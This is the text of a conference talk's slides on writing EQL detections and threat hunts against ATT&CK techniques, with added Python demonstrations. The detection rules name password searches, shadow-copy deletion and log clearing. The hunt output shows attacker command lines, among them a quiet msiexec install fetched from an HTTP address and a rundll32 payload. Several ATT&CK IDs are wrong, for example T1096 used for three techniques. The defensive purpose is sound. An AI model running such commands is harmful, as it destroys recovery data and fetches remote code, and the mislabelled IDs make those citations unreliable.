Circle City Con 2019 and BSides SATX 2019
Abstract:
How do you find malicious activity? We often resort to the cliché "you know it when you see it", but how do you even see it without drowning in data? MITRE's ATT&CK knowledge base organizes adversary behavior into tactics and techniques, and orients our approach to endpoint data. It suggests questions that might be worth asking, but not a way to ask them. The Event Query Language (EQL) allows a security analyst to naturally express queries for IOC search, hunting, and behavioral detections, while remaining platform and data source agnostic.
In this talk, I will demonstrate the iterative process of establishing situational awareness in your environment, creating targeted detections, and hunting for the adversary in your environment with real data, queries, and results.
2. ENDGAME
chmod +rw bio
Ross Wolf
@rw_access
Threat Researcher at Endgame
- Develop detection frameworks and individual detections
- Developed Event Query Language
- Experience in red and blue teaming
5. TALK OVERVIEW
• Developing threat-based detections with ATT&CK and your data
• Crash course through Event Query Language
• Follow the trail of a generic threat actor, writing detections for each step
• Explore threat hunting methods to find the known unknowns
• Contribute back to the community
7. DETECTION PROCESS
• Use ATT&CK to identify common behaviors, instead of just tools
• Explore the mind of the attacker
• Understand your data and visibility
• Express detection logic for your platform
• Continuously create, test, and refine analytics
• Atomic Red Team, CALDERA, Red Team Automation, etc.
• Evaluate against human red teams
• Don't be afraid to retire analytics!
https://www.mitre.org/publications/technical-papers/finding-cyber-threats-with-attck-based-analytics
8. ATTACKER TRADECRAFT
• Gain access to establish the initial foothold
• Discover information about the endpoint
• Persist to survive system reboots
• Establish command and control (C2)
• Gain additional privileges and credentials
• Move between hosts and execute commands
• Collect and exfiltrate sensitive information
• Destroy data or negatively impact mission
• All while evading monitoring and protections
ATT&CK Tactics
Initial Access
Execution
Persistence
Privilege Escalation
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Command and Control
Exfiltration
Impact
9. MITRE ATT&CK™ FRAMEWORK
• Knowledge base that organizes behaviors (techniques) by objectives (tactics)
• Most techniques are used by multiple groups and red teams
• Hundreds of references to threat reports
11. KNOW YOUR DATA
• Data originally gathered from Sysmon
• Converted to a common schema
• file, process, network, and registry event monitoring
https://eqllib.readthedocs.io/en/latest/schemas.html
command_line         C:\Windows\Explorer.EXE
md5                  ac4c51eb24aa95b77f705ab159189e24
parent_process_name  userinit.exe
parent_process_path  C:\Windows\system32\userinit.exe
pid                  2460
ppid                 3052
process_name         explorer.exe
process_path         C:\Windows\explorer.exe
subtype              create
timestamp            131485997150000000
user_domain          research
user_name            researcher
12. INTRO TO EQL
• Event Query Language is simple and concise
• Schema-independent and OS-agnostic
• Designed for real-time detection with stream processing
• Supports multi-event behaviors, stacking and sifting through data
• Function syntax instead of keyword explosion (e.g. length(field))
13. SIMPLE QUERIES
• Boolean and comparison logic
and or not < <= == != >= >
• Wildcard matching with * character
• String comparisons are case-insensitive
process where process_name == "svchost.exe" and
(command_line != "* -k *" or
parent_process_name != "services.exe")
https://eql.readthedocs.io/en/latest/query-guide
14. SEQUENCES
• Multi-event behaviors with ordering
• Match properties between events with by syntax
• Time limits with maxspan (e.g. maxspan=1h)
• Sequences can be expired with an until condition
sequence with maxspan=5m
[ file where file_name == "*.exe"] by user_name, file_path
[ process where true] by user_name, process_path
15. JOINS
• Match events specified, without time limits
• Supports by and until syntax for additional matching or state
• Unlike SQL, it finds adjacent pairs instead of cross-products
join
[file where file_path == "*\\System32\\Tasks\\h4x0r.xml"]
[registry where registry_path == "*\\runonce\\h4xor"]
16. JOINS
join by source_ip, destination_ip
[network where destination_port == 3389] // RDP
[network where destination_port == 135] // RPC
[network where destination_port == 445] // SMB
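An added example (not code from the talk or the EQL project) showing how the sequence and join matching described on the Sequences and Joins slides behave: a small Python matcher runs the file-then-process sequence from the Sequences slide over constructed events, once with maxspan=5m and once with no time limit (the join case). Event layout, user names and paths are all constructed.

```python
import fnmatch
from datetime import datetime, timedelta

# Constructed sample events (not the talk's data set): alice's dropped .exe runs one
# minute after it is written, bob's runs ten minutes later.
EVENTS = [
    {"event_type": "file", "timestamp": "2019-05-20T10:00:00", "user_name": "alice",
     "file_name": "update.exe", "file_path": "C:\\Users\\alice\\update.exe"},
    {"event_type": "process", "timestamp": "2019-05-20T10:01:00", "user_name": "alice",
     "process_path": "C:\\Users\\alice\\update.exe"},
    {"event_type": "file", "timestamp": "2019-05-20T11:00:00", "user_name": "bob",
     "file_name": "tool.exe", "file_path": "C:\\Temp\\tool.exe"},
    {"event_type": "process", "timestamp": "2019-05-20T11:10:00", "user_name": "bob",
     "process_path": "C:\\Temp\\tool.exe"},
]

# Stages of: sequence [file where file_name == "*.exe"] by user_name, file_path
#                     [process where true] by user_name, process_path
STAGES = [
    ("file", lambda e: fnmatch.fnmatch(e["file_name"].lower(), "*.exe"), ("user_name", "file_path")),
    ("process", lambda e: True, ("user_name", "process_path")),
]

def ts(event):
    return datetime.fromisoformat(event["timestamp"])

def match_sequence(events, stages, maxspan=None):
    """Return completed matches, one list of events (one per stage) per match.

    A stage is (event_type, predicate, by_fields); the by values of stage N must
    equal stage N-1's, and the whole match must fit inside maxspan. maxspan=None is
    the join case: no time limit, but still adjacent pairs rather than a
    cross-product, because a new stage-0 event for a key replaces the older partial.
    """
    pending = {}     # by-key -> events matched so far for that key
    matches = []
    for ev in sorted(events, key=ts):
        for idx, (etype, pred, by) in enumerate(stages):
            if ev["event_type"] != etype or not pred(ev):
                continue
            key = tuple(ev.get(f) for f in by)
            if idx == 0:
                pending[key] = [ev]
            elif key in pending and len(pending[key]) == idx:
                partial = pending.pop(key) + [ev]
                if maxspan is not None and ts(ev) - ts(partial[0]) > maxspan:
                    continue                   # too slow: the partial match expires
                if len(partial) == len(stages):
                    matches.append(partial)
                else:
                    pending[key] = partial
            break
    return matches

def dropped_exe_sequence(events=EVENTS):
    """sequence with maxspan=5m: only alice's file/process pair qualifies."""
    return match_sequence(events, STAGES, maxspan=timedelta(minutes=5))

def dropped_exe_join(events=EVENTS):
    """join (no maxspan): both pairs qualify."""
    return match_sequence(events, STAGES)
```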
17. PIPES AND OUTLIERS
• Pipes can be used to transform or reduce output
• Combine in various ways to perform stacking or reduce data set
• count filter head sort tail unique unique_count
process where true
// Remove duplicate pairs
| unique process_name, command_line
// Count per process_name to get unique # of commands
| count process_name
| filter count < 5
18. PROCESS LINEAGE
network where process_name == "powershell.exe"
and not descendant of
[process where process_name == "explorer.exe"]
• Natively tracks process lineage by monitoring create/terminate events
• Supports descendant of, child of, and event of
• Combine with other boolean logic
19. PROCESS LINEAGE
file where file_name == "*.exe"
and event of [process where child of
[process where process_name == "powershell.exe"]]
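An added example (not code from the talk or the EQL project) of the lineage tracking the Process Lineage slides describe: a Python process tree built only from create/terminate events, answering child of and descendant of for the powershell.exe network query on slide 18, including the case where a PID is reused after the original process exits. All PIDs, names and addresses are constructed.

```python
import fnmatch

# Constructed event stream (not the talk's data set): the first powershell.exe runs under
# cmd.exe under explorer.exe; its PID is later reused by one started from svchost.exe.
EVENTS = [
    {"event_type": "process", "subtype": "create", "pid": 100, "ppid": 1, "process_name": "explorer.exe"},
    {"event_type": "process", "subtype": "create", "pid": 200, "ppid": 100, "process_name": "cmd.exe"},
    {"event_type": "process", "subtype": "create", "pid": 300, "ppid": 200, "process_name": "powershell.exe"},
    {"event_type": "network", "pid": 300, "process_name": "powershell.exe", "destination_address": "203.0.113.5"},
    {"event_type": "process", "subtype": "terminate", "pid": 300},
    {"event_type": "process", "subtype": "create", "pid": 400, "ppid": 1, "process_name": "services.exe"},
    {"event_type": "process", "subtype": "create", "pid": 500, "ppid": 400, "process_name": "svchost.exe"},
    {"event_type": "process", "subtype": "create", "pid": 300, "ppid": 500, "process_name": "powershell.exe"},
    {"event_type": "network", "pid": 300, "process_name": "powershell.exe", "destination_address": "198.51.100.9"},
]

class ProcessTree:
    """Lineage state from create/terminate events, queried as later events arrive."""
    def __init__(self):
        self.name = {}        # live pid -> process_name
        self.ancestors = {}   # live pid -> ancestor names, nearest parent first

    def observe(self, event):
        if event["event_type"] != "process":
            return
        pid = event["pid"]
        if event["subtype"] == "create":
            ppid = event["ppid"]
            # snapshot the parent's lineage now, so it survives the parent exiting later
            chain = [self.name[ppid]] + self.ancestors[ppid] if ppid in self.name else []
            self.name[pid], self.ancestors[pid] = event["process_name"], chain
        else:   # terminate: a later create with this pid starts a fresh lineage
            self.name.pop(pid, None)
            self.ancestors.pop(pid, None)

    def child_of(self, pid, pattern):
        return self.descendant_of(pid, pattern, depth=1)

    def descendant_of(self, pid, pattern, depth=None):
        chain = self.ancestors.get(pid, [])[:depth]
        return any(fnmatch.fnmatch(n.lower(), pattern.lower()) for n in chain)

def tree_after(events, count):
    """Lineage state after observing the first `count` events."""
    tree = ProcessTree()
    for ev in events[:count]:
        tree.observe(ev)
    return tree

def powershell_not_under_explorer(events=EVENTS):
    """network where process_name == "powershell.exe"
       and not descendant of [process where process_name == "explorer.exe"]"""
    tree, hits = ProcessTree(), []
    for ev in events:
        tree.observe(ev)
        if (ev["event_type"] == "network" and ev["process_name"].lower() == "powershell.exe"
                and not tree.descendant_of(ev["pid"], "explorer.exe")):
            hits.append(ev["destination_address"])
    return hits
```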
21. APPROACH TO DETECTION
• Understand common tactics employed by the adversary
• Next, move to specific methods or techniques
• From there we can craft detection logic
• When necessary, understand operating system internals
22. INITIAL ACCESS & EXECUTION
• Technique: Spearphishing Attachment (T1193), PowerShell (T1086)
• Detection: Scriptable child processes of Office products (PowerShell, VB script, cmd.exe)
process where
parent_process_name in ("winword.exe", "excel.exe", "powerpnt.exe")
and process_name in ("powershell.exe", "cscript.exe",
"wscript.exe", "cmd.exe")
23. INITIAL ACCESS & EXECUTION
• Technique: Spearphishing Attachment (T1193)
• Detection: Office creating a PE file that quickly executes
sequence with maxspan=5m
[file where file_name == "*.exe"
and process_name in ("winword.exe", "excel.exe", "powerpnt.exe")
] by file_path
[process where true] by process_path
24. PERSISTENCE & PRIVILEGE ESCALATION
• Technique: Scheduled Task (T1053)
• Detection: The API is cumbersome, so many tools directly execute schtasks.exe. Look for non-SYSTEM users creating tasks that run as SYSTEM
process where process_name == "schtasks.exe"
and user_name != "SYSTEM"
and (command_line == "* /ru system" or
command_line == '* /ru "nt authority"')
| unique user_name, command_line
25. COMMAND AND CONTROL (C2)
• Technique: Uncommonly Used Port (T1065)
network where not destination_port in (
1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,
49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,
113,119,125,135,139,143,144,146,161,163,179,199,211,212,222,
254,255,256,259,264,280,301,306
/* many more? */)
| unique destination_address, destination_port
26. COMMAND AND CONTROL (C2)
• Technique: Outgoing Connection from Abusable Process (T???)
• Detection: Look for network activity from abusable binaries; continuously tune to your environment
sequence by pid
[process where subtype.create]
[network where process_name in ( // known LOLBINS
"powershell.exe", "mshta.exe", "installutil.exe",
"msxsl.exe", "rundll32.exe")]
| unique events[0].process_path, events[1].destination_address,
events[1].destination_port
27. DEFENSE EVASION
• Technique: Masquerading (T1096)
• Detection: Look for executables matching names of known Windows binaries from system32, but in the wrong directory
process where process_name in (
"csrss.exe", "dllhost.exe", "lsass.exe",
"lsm.exe", "services.exe", "winlogon.exe"
/* etc */
) and not process_path == "C:\\windows\\system32\\*"
https://www.endgame.com/blog/how-hunt-masquerade-ball
28. DEFENSE EVASION
• Technique: Process Injection (T1096), Process Hollowing (T1093)
• Detection: Look for process creations from the wrong parent
process where
(process_name == "lsass.exe" and parent_process_name != "wininit.exe") or
(process_name == "LogonUI.exe" and
not parent_process_name in ("winlogon.exe", "wininit.exe")) or
(process_name == "services.exe" and parent_process_name != "wininit.exe") or
(process_name == "svchost.exe" and parent_process_name != "services.exe" and
// the system32\svchost.exe executes syswow64\svchost.exe for 32-bit DLLs
not (parent_process_path == "*\\system32\\svchost.exe" and
process_path == "*\\syswow64\\svchost.exe"))
29. CREDENTIAL ACCESS
• Technique: Access Sensitive Data or Credentials in Files (T1087)
• Detection: Look for commands that search for "password"
process where process_name == "findstr.exe"
and command_line == "*password*"
| unique parent_process_name, command_line
30. DISCOVERY
• Technique: Account Discovery (T1087), Remote System Discovery (T1096), System Account Discovery (T1033)
• Detection: Look for any users that run multiple different types of discovery commands
join by user_name
[process where process_name in
("ipconfig.exe", "hostname.exe", "whoami.exe")]
[process where process_name == "net.exe" and
(command_line == "*group*" or command_line == "* user*")]
[process where process_name in ("tasklist.exe", "qprocess.exe", "sc.exe")]
| unique user_name
31. LATERAL MOVEMENT
• Technique: Windows Remote Management (T1028), PowerShell (T1086)
• Approach: Look for incoming WinRM connections with execution of the provider
sequence with maxspan=2s
[network where destination_port in (5985, 5986) and
process_name == "svchost.exe"]
[process where process_name == "wsmprovhost.exe" and
command_line == "*embedding*"]
| unique events[0].source_address,events[0].destination_address,
events[1].user_name
32. COLLECTION & EXFILTRATION
• Technique: Data Staged (T1074), Data Compressed (T1072), Data Encrypted (T1022)
• Detection: Look for known command lines for tools that indicate compression and encryption
sequence by unique_pid with maxspan=5m
// -hp is the rar switch that both compresses and encrypts (including file names)
[process where command_line == "* -hp*" or command_line == "* /hp*"]
[file where file_name == "*.rar"]
| unique events[0].process_path, events[1].file_name
33. IMPACT
• Technique: Inhibit System Recovery (T1490)
• Detection: Monitor known command lines
process where
(process_name == "vssadmin.exe" and
command_line == "*delete*") or
(process_name == "wmic.exe" and
command_line == "*shadow*delete*") or
(process_name == "wevtutil.exe" and command_line == "* cl *")
37. APPROACHES
• We want to look proactively for evidence of an adversary
• Often technique-agnostic, but still follow attacker lifecycle
• Ask environment-oriented questions
• Establish situational awareness and track deviations
• Prevalence
• Recency
• Patterns
is this threat hunting?
38. UNUSUAL PARENT-CHILD RELATIONSHIPS
What parent-child process relationships are rare and recent?
process where subtype.create
| unique_count parent_process_name, process_name
| tail 100
| sort count
| head 10
parent_process_name              command_line
MSI9BBF.tmp                      "C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe" -u auto-update
powershell.exe                   rundll32.exe C:\Users\vagrant\AppData\Local\cyzfc.dat,PointFunctionCall
wuauclt.exe                      "C:\WINDOWS\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.293.2420.0.exe" WD /q
AM_Delta_Patch_1.293.2420.0.exe  C:\WINDOWS\system32\MpSigStub.exe /stub 1.1.1 ...
39. UNUSUAL PARENT-CHILD RELATIONSHIPS
What parent-child process relationships are rare and recent?
process where subtype.create and (
process_name in ("cmd.exe", "powershell.exe")
or parent_process_name in
("cmd.exe", "powershell.exe"))
| unique_count parent_process_name, process_name
| tail 100
| sort count
| head 10
parent_process_name  command_line
powershell.exe       rundll32.exe C:\Users\vagrant\AppData\Local\cyzfc.dat,PointFunctionCall
40. REMOTE ACCESS TOOLS
What recently first-seen processes also made network connections?
join by process_path
[process where subtype.create]
[network where true]
| unique events[0].process_path
| tail 50
process_name          command_line
InstallUtil.exe       C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=False /U mydotnet.exe
OneDriveSetup.exe     "C:\Users\developer\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" /update /restart
OfficeClickToRun.exe  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.11601.20230\OfficeClickToRun.exe" /update
i'm in
41. SUDDEN EXTROVERTS
What processes have been seen before, but only recently made network activity?
sequence by process_path
[process where timestamp_utc < "2019-05-01"]
[network where timestamp_utc > "2019-05-17"]
until
[network where timestamp_utc < "2019-05-17"]
| unique process_path
command_line
msiexec.exe /quiet /i http://172.31.27.16:8000/bin/Installer.msi
42. FILE SYSTEM WEAKNESSES
What privileged files were modified by a user but executed as SYSTEM?
sequence
[file where subtype.create and
file_name == "*.exe" and
user_name != "SYSTEM"] by file_path
[process where user_name == "SYSTEM"] by process_path
| unique events[0].file_path
user_name  process_name    file_path
vagrant    jusched.exe     C:\Windows\system32\inf\svchost.exe
zoom       CptInstall.exe  "C:\Program Files (x86)\Common Files\Zoom\Support\CptService.exe"
43. REMOTE RECONNAISSANCE
What enumeration commands were executed from processes with outgoing network activity?
process where process_name in (
"whoami.exe", "hostname.exe", "ipconfig.exe",
"net.exe", "netstat.exe", "tasklist.exe"
) and child of [network where subtype.outgoing]
| unique parent_process_path, process_name
| unique_count parent_process_path
command_line  process_name        count
whoami.exe    powershell_ise.exe  1
hostname.exe  dxdiag0732.exe      1
netstat.exe   python.exe          1
*slaps eql* this hunt can find so many recon commands
44. BRUTE FORCE ATTEMPTS
Are there multiple logon failures and eventually a success from a remote host?
sequence by ip_address with maxspan=1h
[security where event_id == 4625
and logon_type in (3,5,10)]
[security where event_id == 4625
and logon_type in (3,5,10)]
[security where event_id == 4625
and logon_type in (3,5,10)]
[security where event_id == 4625
and logon_type in (3,5,10)]
[security where event_id == 4624
and logon_type in (3,5,10)]
until
[security where event_id == 4624] // success
4625 - failure
4624 - success
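An added example (not code from the talk or the EQL project) of the brute-force sequence above written as a per-source-IP state machine in Python: four remote logon failures followed within maxspan by a remote success raise an alert, and any 4624 from that IP clears its pending state, which is the role the until clause plays. The Security events, IPs and timestamps are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed Windows Security events (not the talk's data set). 4625 = failed logon,
# 4624 = successful logon; logon types 3/5/10 are network, service and RDP.
EVENTS = [
    {"event_id": 4625, "logon_type": 3, "ip_address": "10.0.0.5", "timestamp": "2019-05-20T09:00:00"},
    {"event_id": 4625, "logon_type": 3, "ip_address": "10.0.0.5", "timestamp": "2019-05-20T09:00:05"},
    {"event_id": 4625, "logon_type": 3, "ip_address": "10.0.0.5", "timestamp": "2019-05-20T09:00:10"},
    {"event_id": 4625, "logon_type": 3, "ip_address": "10.0.0.5", "timestamp": "2019-05-20T09:00:15"},
    {"event_id": 4624, "logon_type": 10, "ip_address": "10.0.0.5", "timestamp": "2019-05-20T09:00:20"},
    # second host: two failures, a success (clears state via 'until'), two more, a success
    {"event_id": 4625, "logon_type": 3, "ip_address": "10.0.0.9", "timestamp": "2019-05-20T09:10:00"},
    {"event_id": 4625, "logon_type": 3, "ip_address": "10.0.0.9", "timestamp": "2019-05-20T09:10:05"},
    {"event_id": 4624, "logon_type": 3, "ip_address": "10.0.0.9", "timestamp": "2019-05-20T09:10:10"},
    {"event_id": 4625, "logon_type": 3, "ip_address": "10.0.0.9", "timestamp": "2019-05-20T09:10:15"},
    {"event_id": 4625, "logon_type": 3, "ip_address": "10.0.0.9", "timestamp": "2019-05-20T09:10:20"},
    {"event_id": 4624, "logon_type": 3, "ip_address": "10.0.0.9", "timestamp": "2019-05-20T09:10:25"},
]

REMOTE_LOGON_TYPES = {3, 5, 10}

def brute_force_then_success(events, failures=4, maxspan=timedelta(hours=1)):
    """Emit (ip, success_timestamp) when `failures` remote logon failures from one IP
    are followed within maxspan by a remote success. Any 4624 from that IP clears its
    partial state afterwards, mirroring the query's 'until' clause."""
    window = defaultdict(deque)   # ip -> timestamps of recent qualifying failures
    alerts = []
    for ev in sorted(events, key=lambda e: e["timestamp"]):
        ip, t = ev["ip_address"], datetime.fromisoformat(ev["timestamp"])
        q = window[ip]
        while q and t - q[0] > maxspan:
            q.popleft()                   # failures older than maxspan cannot count
        if ev["event_id"] == 4625 and ev["logon_type"] in REMOTE_LOGON_TYPES:
            q.append(t)
        elif ev["event_id"] == 4624:
            if ev["logon_type"] in REMOTE_LOGON_TYPES and len(q) >= failures:
                alerts.append((ip, ev["timestamp"]))
            q.clear()                     # 'until': a success expires the pending sequence
    return alerts
```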
45. WHYMI HERE?
What commands were spawned from WMI remotely or as a different user?
process where subtype.create
| unique authentication_id
| filter not user_name in
("SYSTEM", "NT AUTHORITY", "LOCAL SERVICE") and
(process_name == "wmiprvse.exe" or parent_process_name == "wmiprvse.exe")
| unique process_name
command_line
cmd /c "tasklist /svc > %SystemRoot%\TEMP\nessus_task_listIVC4798D.TMP & ren %SystemRoot%\TEMP\nessus_task_listIVC4798D.TMP nessus_task_listIVC4798D.TXT"
recdiscm32.exe \\10.1.2.3\admin$\system32\taskchg16.exe
46. SUSPICIOUS LATERAL MOVEMENT
What endpoints remotely connected via SMB and RPC to potentially upload and execute?
sequence by destination_address
with maxspan=30s
[network where subtype.incoming
and destination_port == 445]
[network where subtype.incoming
and destination_port == 135]
| unique source_address
• Noisy on domain controllers
• Incoming traffic to workstations is suspicious
48. DOWNLOAD EQL
• Install the python package (supports 2.7, 3.4+) with pip install eql
• Built-in CLI (eql query) with stdin/stdout redirection
• Read the Getting Started blog post for more information
• endgame.com/blog/technical-blog/getting-started-eql
50. ANALYTICS LIBRARY
• Browse the analytics library
• eqllib.readthedocs.io
• Contribute your detection and hunting logic
• github.com/endgameinc/eqllib
• 45+ analytics mapped to MITRE ATT&CK with
contributions from Endgame and Red Canary
• Multiple data sets to get your hands dirty
• github.com/endgameinc/eqllib/tree/master/data
52. NORMALIZATION
• Contribute schema mappings
• Currently map to Microsoft Sysmon and MITRE Cyber Analytics Repository
• Convert queries to mapped data sources
$ eqllib convert-query -s "Microsoft Sysmon" 'process where subtype.create and
process_name == "mshta.exe" and command_line == "* c:\\programdata\\*.hta"'
process where EventId == 1 and Image == "*\\mshta.exe"
and CommandLine == "* c:\\programdata\\*.hta"
• Normalize from mapped data sources to sharable format
53. WHAT'S NEXT?
• Early June update to EQL 0.7
• Contains a schema validation with better error checking
• Cleaner python API for integrating with other projects
• Summer release of 75+ atomic analytics mapped to ATT&CK
54. GET IN TOUCH
• Follow EQL on Twitter
• @eventquerylang
• Chat on Gitter
• gitter.im/eventquerylang/community
• Email us
• eql AT endgame.com
55. RESOURCES
• Getting started with EQL (blog)
• endgame.com/blog/technical-blog/getting-started-eql
• Endgame Guide to Threat Hunting (PDF)
• pages.endgame.com/wc-guide-to-threat-hunting.html
• Follow the guide for creating sophisticated queries
• eql.readthedocs.io/query-guide
• Documentation
• eql.readthedocs.io
• Clone it!
• github.com/endgameinc/eql
• github.com/endgameinc/eqllib